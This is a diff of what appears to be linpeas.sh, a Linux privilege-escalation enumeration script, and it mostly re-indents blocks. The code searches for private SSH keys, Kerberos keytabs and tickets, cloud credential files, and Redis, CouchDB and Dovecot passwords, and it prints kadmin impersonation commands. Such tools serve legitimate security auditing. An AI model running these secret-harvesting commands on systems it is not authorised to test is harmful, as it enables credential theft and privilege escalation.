@@ -2575,243 +2537,243 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) - fi +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl 
'\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" - fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then 
- print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then echo "" - - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi + print_3title "Possible private SSH keys were found!" 
| sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi echo "" - - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | 
grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" - #-- SI) Kerberos - print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi - if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; - fi +#-- SI) PAM auth +print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" +pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) +if [ "$pamssh" ]; then + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" - printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do - if [ -r "$f" ]; then - if echo "$f" | grep -q .k5login; then - echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} 
"s,.*,${SED_RED},g" - elif echo "$f" | grep -q keytab; then - echo "" - echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && echo "$l" | grep -q "@"; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that - fi - done - elif echo "$f" | grep -q krb5.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" - cat "$f" 2>/dev/null - elif echo "$f" | grep -q sssd.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; - elif echo "$f" | grep -q secrets.ldb; then - echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - elif echo "$f" | grep -q .secrets.mkey; then - echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - fi +#-- SI) NFS exports +print_2title "NFS exports?" 
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" +if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," +else echo_not_found "/etc/exports" +fi +echo "" + +#-- SI) Kerberos +print_2title "Searching kerberos conf files and tickets" +print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi +if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; +fi + +printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + 
#kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" fi - done - ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" - klist 2>/dev/null || echo_not_found "klist" - echo "" + fi +done +ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" +klist 2>/dev/null || echo_not_found "klist" +echo "" - print_2title "Analyzing Knockd Files (limit 70)" + print_2title "Analyzing Knockd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Kibana Files (limit 70)" + print_2title "Analyzing Kibana Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Elasticsearch Files (limit 70)" + print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ]; then + printf 
"$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +else echo_not_found +fi +echo "" - #-- SI) Vault-ssh - print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi +#-- SI) Vault-ssh +print_2title "Searching Vault-ssh files" +if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +else echo_not_found "vault-ssh-helper.hcl" +fi +echo "" - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) - print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" 
"/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
- else echo_not_found "cached hashes"
- fi
- echo ""
+#-- SI) Cached AD Hashes
+adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
+print_2title "Searching AD cached hashes"
+if [ "$adhashes" ]; then
+ ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
+else echo_not_found "cached hashes"
+fi
+echo ""
- #-- SI) Screen sessions
- print_2title "Searching screen sessions"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
- screensess=$(screen -ls 2>/dev/null)
- if [ "$screensess" ]; then
- printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
- else echo_not_found "screen"
- fi
- echo ""
+#-- SI) Screen sessions
+print_2title "Searching screen sessions"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
+screensess=$(screen -ls 2>/dev/null)
+if [ "$screensess" ]; then
+ printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
+else echo_not_found "screen"
+fi
+echo ""
- #-- SI) Tmux sessions
- tmuxdefsess=$(tmux ls 2>/dev/null)
- tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
- print_2title "Searching tmux sessions"$N
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
- if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then
- printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
- else echo_not_found "tmux"
- fi
- echo ""
+#-- SI) Tmux sessions
+tmuxdefsess=$(tmux ls 2>/dev/null)
+tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
+print_2title "Searching tmux 
sessions"$N +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else echo_not_found "tmux" +fi +echo "" - print_2title "Analyzing CouchDB Files (limit 70)" + print_2title "Analyzing CouchDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Redis Files (limit 70)" + print_2title "Analyzing Redis Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; - #-- SI) Dovecot - # Needs testing - print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then - echo_not_found "dovecot credentials" - else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do - df=$(echo $d |cut -d ':' -f1) - dp=$(echo $d |cut -d ':' -f2-) - echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi - echo "" +#-- SI) Dovecot +# Needs testing +print_2title "Searching dovecot files" +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" +else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done +fi +echo "" - print_2title "Analyzing Mosquitto Files (limit 70)" + print_2title "Analyzing Mosquitto Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Neo4j Files (limit 70)" + print_2title "Analyzing Neo4j Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Cloud Credentials Files (limit 70)" + print_2title "Analyzing Cloud Credentials Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 
@@ -2824,112 +2786,112 @@ if echo $CHECKS | grep -q SofI; then
 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
- print_2title "Analyzing Cloud Init Files (limit 70)"
+ print_2title "Analyzing Cloud Init Files (limit 70)"
